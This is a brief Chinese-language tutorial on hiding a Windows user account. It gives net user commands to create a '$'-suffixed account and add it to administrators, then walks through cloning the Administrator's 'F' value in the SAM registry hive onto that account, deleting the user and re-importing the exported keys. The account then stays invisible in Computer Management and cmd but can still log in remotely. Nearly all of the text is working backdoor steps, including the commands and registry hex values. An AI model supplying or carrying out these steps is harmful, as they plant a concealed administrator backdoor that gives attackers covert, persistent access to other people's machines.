windows 隐藏账号
命令行输入以下命令,可以进行简单的隐藏(**命令行下不可见**)
net user test$ 123456 /add
net localgroup administrators test$ /add
在计算机管理可看到
通过注册表隐藏用户(实现步骤如下):
要实现很好的隐藏,需要通过注册表,运行中输入regedit,
然后点击HKEY_LOCAL_MACHINE>SAM>SAM,,
然后添加相应的权限:
Windows账号克隆
对test$和0x3ef目录右键导出
(若想给test$用户赋权,则可以将该用户的键值
(例子中为0x3ef)改为Administrator的所对应的键值即可。)
| 用户名 | 对应文件名 |
|---|---|
| test$ | 0x3ef |
| administrator | 01f4 |
打开 01f4 复制 F的值 粘贴到 0x3ef
"F"=hex:02,00,01,00,00,00,00,00,dc,e0,2d,5f,04,67,d9,01,00,00,00,00,00,00,00,\
00,db,05,c8,34,30,89,cb,01,00,00,00,00,00,00,00,00,49,cd,96,ae,d2,79,d9,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,09,00,01,00,00,00,00,\
00,32,00,39,00,38,00
保存后 执行删除 test$ 用户的命令
net user test$ /del
看不到test$用户了
最后我们执行 reg文件
执行完之后 在计算机管理和cmd依然没有看到 test$用户 现在尝试远程登录
可以看到我们已经登录成功
